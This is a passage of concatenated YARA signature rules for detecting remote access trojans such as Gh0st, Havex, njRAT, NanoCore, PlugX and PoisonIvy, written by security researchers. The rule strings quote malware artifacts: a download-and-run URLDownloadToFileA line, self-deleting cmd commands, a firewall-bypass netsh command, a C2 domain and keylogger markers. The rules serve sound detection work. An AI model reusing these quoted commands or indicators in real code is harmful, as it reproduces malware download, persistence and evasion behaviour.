"deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly" $capability = "GetClipboardData" $capability1 = "capCreateCaptureWindowA" $capability2 = "CreateRemoteThread" $capability3 = "WriteProcessMemory" $capability4 = "LsaRetrievePrivateData" $capability5 = "AdjustTokenPrivileges" $function = "ResetSSDT" $window = "WinSta0\\Default" $magic = {47 6C 6F 62 61 6C 5C [5-9] 20 25 64} /* $magic = "Gh0st" */ condition: all of them } rule Gh0st : RAT { meta: description = "Gh0st" author = "botherder https://github.com/botherder" strings: $ = /(G)host/ $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/ $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/ $ = /(%)s\\shell\\open\\command/ $ = /(G)etClipboardData/ $ = /(W)riteProcessMemory/ $ = /(A)djustTokenPrivileges/ $ = /(W)inSta0\\Default/ $ = /(#)32770/ $ = /(#)32771/ $ = /(#)32772/ $ = /(#)32774/ condition: all of them } rule gh0st { meta: author = "https://github.com/jackcr/" strings: $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C } $b = "Gh0st Update" condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule gholeeV1 { meta: Author = "@GelosSnake" Date = "2014/08" Description = "Gholee first discovered variant " Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" strings: $a = "sandbox_avg10_vc9_SP1_2011" $b = "gholee" condition: all of them } rule gholeeV2 { meta: Author = "@GelosSnake" Date = "2015-02-12" Description = "Gholee first discovered variant " Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" strings: $string0 = "RichHa" $string1 = " ((((( H" wide $string2 = "1$1,141<1D1L1T1\\1d1l1t1" $string3 = "<8;$O' " $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]" $string5 = "jYPQTVTSkllZTTXRTUiHceWda/" $string6 = "urn:schemas-microsoft-com:asm.v1" $string7 = "8.848H8O8i8s8y8" $string8 = "wrapper3" wide $string9 = "pwwwwwwww" $string10 = "Sunday" $string11 = "YYuTVWh" $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN" $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt" $string15 = "wrapper3 Version 1.0" wide $string16 = "77A779" $string17 = "<C<G<M<R<X<" $string18 = "9 9-9N9X9s9" condition: 18 of them } rule MW_gholee_v1 : v1 { meta: Author = "@GelosSnake" description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" date = "2014-08" maltype = "Remote Access Trojan" sample_filetype = "dll" hash0 = "48573a150562c57742230583456b4c02" strings: $a = "sandbox_avg10_vc9_SP1_2011" $b = "gholee" condition: all of them } rule MW_gholee_v2 : v2 { meta: author = "@GelosSnake" date = "2015-02-12" description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" hash0 = "05523761ca296ec09afdf79477e5f18d" hash1 = "08e424ac42e6efa361eccefdf3c13b21" hash2 = "5730f925145f1a1cd8380197e01d9e06" hash3 = "73461c8578dd9ab86d42984f30c04610" sample_filetype = "dll" strings: $string0 = "RichHa" $string1 = " ((((( H" wide $string2 = "1$1,141<1D1L1T1\\1d1l1t1" $string3 = "<8;$O' " $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]" $string5 = "jYPQTVTSkllZTTXRTUiHceWda/" $string6 = "urn:schemas-microsoft-com:asm.v1" $string7 = "8.848H8O8i8s8y8" $string8 = "wrapper3" wide $string9 = "pwwwwwwww" $string10 = "Sunday" $string11 = "YYuTVWh" $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN" $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt" $string15 = "wrapper3 Version 1.0" wide $string16 = "77A779" $string17 = "<C<G<M<R<X<" $string18 = "9 9-9N9X9s9" condition: 18 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule glassrat: RAT { meta: author = "Brian Wallace @botnet_hunter" strings: $a = "PostQuitMessage" $b = "pwlfnn10,gzg" $c = "update.dll" $d = "_winver" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Win32OPCHavex { meta: Author = "BAE Systems" Date = "2014/06/23" Description = "Rule for identifying OPC version of HAVEX" Reference = "www.f-secure.com/weblog/archives/00002718.html" strings: $mzhdr = "MZ" $dll = "7CFC52CD3F87.dll" $a1 = "Start finging of LAN hosts..." wide $a2 = "Finding was fault. Unexpective error" wide $a3 = "Was found %i hosts in LAN:" wide $a4 = "Hosts was't found." wide $a5 = "Start finging of OPC Servers..." wide $a6 = "Was found %i OPC Servers." wide $a7 = "OPC Servers not found. Programm finished" wide $a8 = "%s[%s]!!!EXEPTION %i!!!" wide $a9 = "Start finging of OPC Tags..." wide condition: $mzhdr at 0 and ($dll or (any of ($a*))) } rule Win32FertgerHavex { meta: Author = "BAE Systems" Date = "2014/06/23" Description = "Rule for identifying Fertger version of HAVEX" Reference = "www.f-secure.com/weblog/archives/00002718.html" strings: $mz = "MZ" $a1="\\\\.\\pipe\\mypipe-f" wide $a2="\\\\.\\pipe\\mypipe-h" wide $a3="\\qln.dbx" wide $a4="*.yls" wide $a5="\\*.xmd" wide $a6="fertger" wide $a7="havex" condition: $mz at 0 and 3 of ($a*) } rule Havex_Trojan_PHP_Server { meta: Author = "Florian Roth" Date = "2014/06/24" Description = "Detects the PHP server component of the Havex RAT" Reference = "www.f-secure.com/weblog/archives/00002718.html" strings: $s1 = "havex--></body></head>" $s2 = "ANSWERTAG_START" $s3 = "PATH_BLOCKFILE" condition: all of them } rule SANS_ICS_Cybersecurity_Challenge_400_Havex_Memdump : memory { meta: description = "Detects Havex Windows process executable from memory dump" date = "2015-12-2" author = "Chris Sistrunk" hash = "8065674de8d79d1c0e7b3baf81246e7d" strings: $magic = { 4d 5a } $s1 = "~tracedscn.yls" fullword wide $s2 = "[!]Start" fullword wide $s3 = "[+]Get WSADATA" fullword wide $s4 = "[-]Can not get local ip" fullword wide $s5 = "[+]Local:" fullword wide $s6 = "[-]Threads number > Hosts number" fullword wide $s7 = "[-]Connection error" fullword wide $x1 = "bddd4e2b84fa2ad61eb065e7797270ff.exe" fullword wide condition: $magic at 0 and ( 3 of ($s*) or $x1 ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule apt_win32_dll_rat_hiZor_RAT: RAT { meta: description = "Detects hiZor RAT" hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf" hash2 = "d9821468315ccd3b9ea03161566ef18e" hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a" ref1 = "http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html" ref2 = "https://github.com/Neo23x0/Loki/blob/b187ed063d73d0defc6958100ca7ad04aa77fc12/signatures/apt_hizor_rat.yar" reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf" strings: // Part of the encoded User-Agent = Mozilla $s1 = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 } // XOR to decode User-Agent after string stacking 0x10001630 $s2 = { 66 [7] 0d 40 83 ?? ?? 7c ?? } // XOR with 0x2E - 0x10002EF6 $s3 = { 80 [2] 2e 40 3b ?? 72 ?? } $s4 = "CmdProcessExited" wide ascii $s5 = "rootDir" wide ascii $s6 = "DllRegisterServer" wide ascii $s7 = "GetNativeSystemInfo" wide ascii $s8 = "%08x%08x%08x%08x" wide ascii condition: (uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f) and (all of them) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-10-01 Identifier: Indetectables RAT */ rule Indetectables_RAT: RAT { meta: description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux" author = "Florian Roth" reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/" date = "2015-10-01" super_rule = 1 hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105" hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229" hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801" strings: $s1 = "Coded By M3" fullword wide $s2 = "Stub Undetector M3" fullword wide $s3 = "www.webmenegatti.com.br" wide $s4 = "M3n3gatt1" fullword wide $s5 = "TheMisterFUD" fullword wide $s6 = "KillZoneKillZoneKill" fullword ascii $s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii $s8 = "M3_F_U_D_M3" ascii $s9 = "M3n3gatt1hack3r" fullword wide $s9a = "M3n3gatt1hack3r" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 5000KB and 1 of them } rule BergSilva_Malware : RAT { meta: description = "Detects a malware from the same author as the Indetectables RAT" author = "Florian Roth" date = "2015-10-01" super_rule = 1 hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e" hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc" strings: $x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide $x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide $s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide $s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide $s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide $s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide $s5 = "https://dl.dropbox.com/u/105015858" wide condition: uint16(0) == 0x5a4d and ( 1 of ($x*) or 2 of ($s*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule apt_win32_dll_rat_1a53b0cp32e46g0qio7 { meta: author = "https://www.fidelissecurity.com/" info = "Indicators for FTA-1020" hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf" hash2 = "d9821468315ccd3b9ea03161566ef18e" hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a" reference = "https://github.com/fideliscyber" strings: // Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0;rv:11.0) like Gecko $ = { c7 [2] 64 00 63 00 c7 [2] 69 00 62 00 c7 [2] 7a 00 7e 00 c7 [2] 2d 00 43 00 c7 [2] 59 00 2d 00 c7 [2] 3b 00 23 00 c7 [2] 3e 00 36 00 c7 [2] 2d 00 5a 00 c7 [2] 42 00 5a 00 c7 [2] 3b 00 39 00 c7 [2] 36 00 2d 00 c7 [2] 59 00 7f 00 c7 [2] 64 00 69 00 c7 [2] 68 00 63 00 c7 [2] 79 00 22 00 c7 [2] 3a 00 23 00 c7 [2] 3d 00 36 00 c7 [2] 2d 00 7f 00 c7 [2] 7b 00 37 00 c7 [2] 3c 00 3c 00 c7 [2] 23 00 3d 00 c7 [2] 24 00 2d 00 c7 [2] 61 00 64 00 c7 [2] 66 00 68 00 c7 [2] 2d 00 4a 00 c7 [2] 68 00 6e 00 c7 [2] 66 00 62 00 } // offset 10001566 // Software\Microsoft\Windows\CurrentVersion\Run $ = { c7 [2] 23 00 24 00 c7 [2] 24 00 33 00 c7 [2] 38 00 22 00 c7 [2] 00 00 33 00 c7 [2] 24 00 25 00 c7 [2] 3f 00 39 00 c7 [2] 38 00 0a 00 c7 [2] 04 00 23 00 c7 [2] 38 00 00 00 c7 [2] 43 00 66 00 c7 [2] 6d 00 60 00 c7 [2] 67 00 52 00 c7 [2] 6e 00 63 00 c7 [2] 7b 00 67 00 c7 [2] 70 00 00 00 c7 [2] 43 00 4d 00 c7 [2] 44 00 00 00 c7 [2] 0f 00 43 00 c7 [2] 00 00 50 00 c7 [2] 49 00 4e 00 c7 [2] 47 00 00 00 c7 [2] 11 00 12 00 c7 [2] 17 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 11 00 06 00 c7 [2] 44 00 45 00 c7 [2] 4c 00 00 00 } // 10003D09 $ = { 66 [4-7] 0d 40 83 f8 44 7c ?? } // xor word ptr [ebp+eax*2+var_5C], 14h // inc eax // cmp eax, 14h // Loop to decode a static string. It reveals the "1a53b0cp32e46g0qio9" static string sent in the beacon $ = { 66 [4-7] 14 40 83 f8 14 7c ?? } // 100017F0 $ = { 66 [4-7] 56 40 83 f8 2d 7c ?? } // 10003621 $ = { 66 [4-7] 20 40 83 f8 1a 7c ?? } // 10003640 $ = { 80 [2-7] 2e 40 3d 50 02 00 00 72 ?? } // 10003930 $ = "%08x%08x%08x%08x" wide ascii $ = "WinHttpGetIEProxyConfigForCurrentUser" wide ascii condition: (uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f) and (all of them) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Meterpreter_Reverse_Tcp { meta: // This is the standard backdoor/RAT from Metasploit, could be used by any actor author = "chort (@chort0)" description = "Meterpreter reverse TCP backdoor in memory. Tested on Win7x64." strings: $a = { 4d 45 54 45 52 50 52 45 54 45 52 5f 54 52 41 4e 53 50 4f 52 54 5f 53 53 4c [32-48] 68 74 74 70 73 3a 2f 2f 58 58 58 58 58 58 } // METERPRETER_TRANSPORT_SSL … https://XXXXXX $b = { 4d 45 54 45 52 50 52 45 54 45 52 5f 55 41 } // METERPRETER_UA $c = { 47 45 54 20 2f 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2f 31 2e 30 } // GET /123456789 HTTP/1.0 $d = { 6d 65 74 73 72 76 2e 64 6c 6c [2-4] 52 65 66 6c 65 63 74 69 76 65 4c 6f 61 64 65 72 } // metsrv.dll … ReflectiveLoader condition: $a or (any of ($b, $d) and $c) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Nanocore_RAT_Gen_1 { meta: description = "Detetcs the Nanocore RAT and similar malware" author = "Florian Roth" reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/" date = "2016-04-22" score = 70 hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06" strings: $x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii $x2 = "RunPE1" fullword ascii $x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" fullword ascii $x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" fullword ascii $x5 = "Monitorinjection" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of them ) ) or ( 3 of them ) } rule Nanocore_RAT_Gen_2 { meta: description = "Detetcs the Nanocore RAT" author = "Florian Roth" score = 100 reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/" date = "2016-04-22" hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050" strings: $x1 = "NanoCore.ClientPluginHost" fullword ascii $x2 = "IClientNetworkHost" fullword ascii $x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them ) or ( all of them ) } rule Nanocore_RAT_Sample_1 { meta: description = "Detetcs a certain Nanocore RAT sample" author = "Florian Roth" score = 75 reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/" date = "2016-04-22" hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8" strings: $x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" fullword wide $x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" fullword ascii $x3 = "popthatkitty.Resources.resources" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 1 of ($x*) ) ) or ( all of them ) } rule Nanocore_RAT_Sample_2 { meta: description = "Detetcs a certain Nanocore RAT sample" author = "Florian Roth" score = 75 reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/" date = "2016-04-22" hash1 = "51142d1fb6c080b3b754a92e8f5826295f5da316ec72b480967cbd68432cede1" strings: $s1 = "U4tSOtmpM" fullword ascii $s2 = ")U71UDAU_QU_YU_aU_iU_qU_yU_" fullword wide $s3 = "Cy4tOtTmpMtTHVFOrR" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 40KB and all of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule NetWiredRC_B : RAT { meta: description = "NetWiredRC" author = "Jean-Philippe Teissier / @Jipe_" date = "2014-12-23" filetype = "memory" version = "1.1" strings: $mutex = "LmddnIkX" $str1 = "%s.Identifier" $str2 = "%d:%I64u:%s%s;" $str3 = "%s%.2d-%.2d-%.4d" $str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" $str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d" $klg1 = "[Backspace]" $klg2 = "[Enter]" $klg3 = "[Tab]" $klg4 = "[Arrow Left]" $klg5 = "[Arrow Up]" $klg6 = "[Arrow Right]" $klg7 = "[Arrow Down]" $klg8 = "[Home]" $klg9 = "[Page Up]" $klg10 = "[Page Down]" $klg11 = "[End]" $klg12 = "[Break]" $klg13 = "[Delete]" $klg14 = "[Insert]" $klg15 = "[Print Screen]" $klg16 = "[Scroll Lock]" $klg17 = "[Caps Lock]" $klg18 = "[Alt]" $klg19 = "[Esc]" $klg20 = "[Ctrl+%c]" condition: $mutex or (1 of ($str*) and 1 of ($klg*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Njrat: RAT { meta: description = "Njrat" author = "botherder https://github.com/botherder" strings: $string1 = /(F)romBase64String/ $string2 = /(B)ase64String/ $string3 = /(C)onnected/ wide ascii $string4 = /(R)eceive/ $string5 = /(S)end/ wide ascii $string6 = /(D)ownloadData/ wide ascii $string7 = /(D)eleteSubKey/ wide ascii $string8 = /(g)et_MachineName/ $string9 = /(g)et_UserName/ $string10 = /(g)et_LastWriteTime/ $string11 = /(G)etVolumeInformation/ $string12 = /(O)SFullName/ wide ascii $string13 = /(n)etsh firewall/ wide $string14 = /(c)md\.exe \/k ping 0 & del/ wide $string15 = /(c)md\.exe \/c ping 127\.0\.0\.1 & del/ wide $string16 = /(c)md\.exe \/c ping 0 -n 2 & del/ wide $string17 = {7C 00 27 00 7C 00 27 00 7C} condition: 10 of them } rule njrat1: RAT { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2015-05-27" description = "Identify njRat" strings: $a1 = "netsh firewall add allowedprogram " wide $a2 = "SEE_MASK_NOZONECHECKS" wide $b1 = "[TAP]" wide $b2 = " & exit" wide $c1 = "md.exe /k ping 0 & del " wide $c2 = "cmd.exe /c ping 127.0.0.1 & del" wide $c3 = "cmd.exe /c ping" wide condition: 1 of ($a*) and 1 of ($b*) and 1 of ($c*) } rule win_exe_njRAT { meta: author = "info@fidelissecurity.com" descripion = "njRAT - Remote Access Trojan" comment = "Variants have also been observed obfuscated with .NET Reactor" filetype = "pe" date = "2013-07-15" version = "1.0" hash1 = "92ee1fb5df21d8cfafa2b02b6a25bd3b" hash2 = "3576d40ce18bb0349f9dfa42b8911c3a" hash3 = "24cc5b811a7f9591e7f2cb9a818be104" hash4 = "3ad5fded9d7fdf1c2f6102f4874b2d52" hash5 = "a98b4c99f64315aac9dd992593830f35" hash6 ="5fcb5282da1a2a0f053051c8da1686ef" hash7 = "a669c0da6309a930af16381b18ba2f9d" hash8 = "79dce17498e1997264346b162b09bde8" hash9 = "fc96a7e27b1d3dab715b2732d5c86f80" ref1 = "http://bit.ly/19tlf4s" ref2 = "http://www.fidelissecurity.com/threatadvisory" ref3 = "http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njratuncovered.html" ref4 = "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf" strings: $magic = "MZ" $string_setA_1 = "FromBase64String" $string_setA_2 = "Base64String" $string_setA_3 = "Connected" wide ascii $string_setA_4 = "Receive" $string_setA_5 = "DeleteSubKey" wide ascii $string_setA_6 = "get_MachineName" $string_setA_7 = "get_UserName" $string_setA_8 = "get_LastWriteTime" $string_setA_9 = "GetVolumeInformation" $string_setB_1 = "OSFullName" wide ascii $string_setB_2 = "Send" wide ascii $string_setB_3 = "Connected" wide ascii $string_setB_4 = "DownloadData" wide ascii $string_setB_5 = "netsh firewall" wide $string_setB_6 = "cmd.exe /k ping 0 & del" wide condition: ($magic at 0) and ( all of ($string_setA*) or all of ($string_setB*) ) } rule network_traffic_njRAT { meta: author = "info@fidelissecurity.com" descripion = "njRAT - Remote Access Trojan" comment = "Rule to alert on network traffic indicators" filetype = "PCAP - Network Traffic" date = "2013-07-15" version = "1.0" hash1 = "92ee1fb5df21d8cfafa2b02b6a25bd3b" hash2 ="3576d40ce18bb0349f9dfa42b8911c3a" hash3 ="24cc5b811a7f9591e7f2cb9a818be104" hash4 = "3ad5fded9d7fdf1c2f6102f4874b2d52" hash5 = "a98b4c99f64315aac9dd992593830f35" hash6 = "5fcb5282da1a2a0f053051c8da1686ef" hash7 = "a669c0da6309a930af16381b18ba2f9d" hash8 = "79dce17498e1997264346b162b09bde8" hash9 = "fc96a7e27b1d3dab715b2732d5c86f80" ref1 = "http://bit.ly/19tlf4s" ref2 = "http://www.fidelissecurity.com/threatadvisory" ref3 = "http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html" ref4 = "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf" strings: $string1 = "FM|'|'|" // File Manager $string2 = "nd|'|'|" // File Manager $string3 = "rn|'|'|" // Run File $string4 = "sc~|'|'|" // Remote Desktop $string5 = "scPK|'|'|" // Remote Desktop $string6 = "CAM|'|'|" // Remote Cam $string7 = "USB Video Device[endof]" // Remote Cam $string8 = "rs|'|'|" // Reverse Shell $string9 = "proc|'|'|" // Process Manager $string10 = "k|'|'|" // Process Manager $string11 = "RG|'|'|~|'|'|" // Registry Manipulation $string12 = "kl|'|'|" // Keylogger file $string13 = "ret|'|'|" // Get Browser Passwords $string14 = "pl|'|'|" // Get Browser Passwords $string15 = "lv|'|'|" // General $string16 = "prof|'|'|~|'|'|" // Server rename $string17 = "un|'|'|~[endof]" // Uninstall $idle_string = "P[endof]" // Idle Connection condition: any of ($string*) or #idle_string > 4 } rule RAT_Orcus { meta: author = " J from THL <j@techhelplist.com> with thx to MalwareHunterTeam" date = "2017/01" reference = "https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/" version = 1 maltype = "RAT" filetype = "memory" strings: $text01 = "Orcus.CommandManagement" $text02 = "Orcus.Commands." $text03 = "Orcus.Config." $text04 = "Orcus.Connection." $text05 = "Orcus.Core." $text06 = "Orcus.exe" $text07 = "Orcus.Extensions." $text08 = "Orcus.InstallationPromptForm" $text09 = "Orcus.MainForm." $text10 = "Orcus.Native." $text11 = "Orcus.Plugins." $text12 = "orcus.plugins.dll" $text13 = "Orcus.Properties." $text14 = "Orcus.Protection." $text15 = "Orcus.Share." $text16 = "Orcus.Shared" $text17 = "Orcus.StaticCommands" $text18 = "Orcus.Utilities." $text19 = "\\Projects\\Orcus\\Source\\Orcus." $text20 = ".orcus.plugins.dll.zip" $text21 = ".orcus.shared.dll.zip" $text22 = ".orcus.shared.utilities.dll.zip" $text23 = ".orcus.staticcommands.dll.zip" $text24 = "HvncCommunication" $text25 = "HvncAction" $text26 = "hvncDesktop" $text27 = ".InstallationPromptForm" $text28 = "RequestKeyLogCommand" $text29 = "get_KeyLogFile" $text30 = "LiveKeyloggerCommand" $text31 = "ORCUS.STATICCOMMANDS, VERSION=" $text32 = "PrepareOrcusFileToRemove" $text33 = "ConvertFromOrcusValueKind" condition: 13 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule PlugXStrings : PlugX Family { meta: description = "PlugX Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-12" strings: $BootLDR = "boot.ldr" wide ascii $Dwork = "d:\\work" nocase $Plug25 = "plug2.5" $Plug30 = "Plug3.0" $Shell6 = "Shell6" condition: $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6)) } rule plugX : rat { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "PlugX RAT" date = "2014-05-13" filetype = "memory" version = "1.0" ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py" strings: $v1a = { 47 55 4C 50 00 00 00 00 } $v1b = "/update?id=%8.8x" $v1algoa = { BB 33 33 33 33 2B } $v1algob = { BB 44 44 44 44 2B } $v2a = "Proxy-Auth:" $v2b = { 68 A0 02 00 00 } $v2k = { C1 8F 3A 71 } condition: $v1a at 0 or $v1b or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k)) } rule PlugX_mw { meta: maltype = "plugX" author = "https://github.com/reed1713" reference = "http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html" description = "Malware creates a randomized directory within the appdata roaming directory and launches the malware. Should see multiple events for create process rundll32.exe and iexplorer.exe as it repeatedly uses iexplorer to launch the rundll32 process." strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data=/\\AppData\\Roaming\\[0-9]{9,12}\VMwareCplLauncher\.exe/ $type1="Microsoft-Windows-Security-Auditing" $eventid1="4688" $data1="\\Windows\\System32\\rundll32.exe" $type2="Microsoft-Windows-Security-Auditing" $eventid2="4688" $data2="Program Files\\Internet Explorer\\iexplore.exe" condition: all of them } rule PoetRat_Doc { meta: Author = "Nishan Maharjan" Description = "A yara rule to catch PoetRat Word Document" Data = "6th May 2020" strings: $pythonRegEx = /(\.py$|\.pyc$|\.pyd$|Python)/ // checking for python strings // Python file strings in the word documents $pythonFile1 = "launcher.py" $zipFile = "smile.zip" $pythonFile2 = "smile_funs.py" $pythonFile3 = "frown.py" $pythonFile4 = "backer.py" $pythonFile5 = "smile.py" $pythonFile6 = "affine.py" // dlls and cmd strings $dlls = /\.dll/ $cmd = "cmd" $exe = ".exe" condition: all of them } rule PoetRat_Python { meta: Author = "Nishan Maharjan" Description = "A yara rule to catch PoetRat python scripts" Data = "6th May 2020" strings: // Any of the strings that stand out in the files, these are for the multiple python files, not just for a single file $encrptionFunction = "Affine" $commands = /version|ls|cd|sysinfo|download|upload|shot|cp|mv|link|register|hid|compress|jobs|exit|tasklist|taskkill/ $domain = "dellgenius.hopto.org" $grammer_massacre = /BADD|Bad Error Happened|/ $mayBePresent = /self\.DIE|THE_GUID_KEY/ $pipe_out = "Abibliophobia23" $shot = "shot_{0}_{1}.png" condition: 3 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule poisonivy_1 : rat { meta: description = "Poison Ivy" author = "Jean-Philippe Teissier / @Jipe_" date = "2013-02-01" filetype = "memory" version = "1.0" ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py" strings: $a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C } condition: $a } rule PoisonIvy_Generic_3 { meta: description = "PoisonIvy RAT Generic Rule" author = "Florian Roth" date = "2015-05-14" hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd" strings: $k1 = "Tiger324{" fullword ascii $s2 = "WININET.dll" fullword ascii $s3 = "mscoree.dll" fullword wide $s4 = "WS2_32.dll" fullword $s5 = "Explorer.exe" fullword wide $s6 = "USER32.DLL" $s7 = "CONOUT$" $s8 = "login.asp" $h1 = "HTTP/1.0" $h2 = "POST" $h3 = "login.asp" $h4 = "check.asp" $h5 = "result.asp" $h6 = "upload.asp" condition: uint16(0) == 0x5a4d and filesize < 500KB and ( $k1 or all of ($s*) or all of ($h*) ) } rule PoisonIvy_2 { meta: author = " Kevin Breen 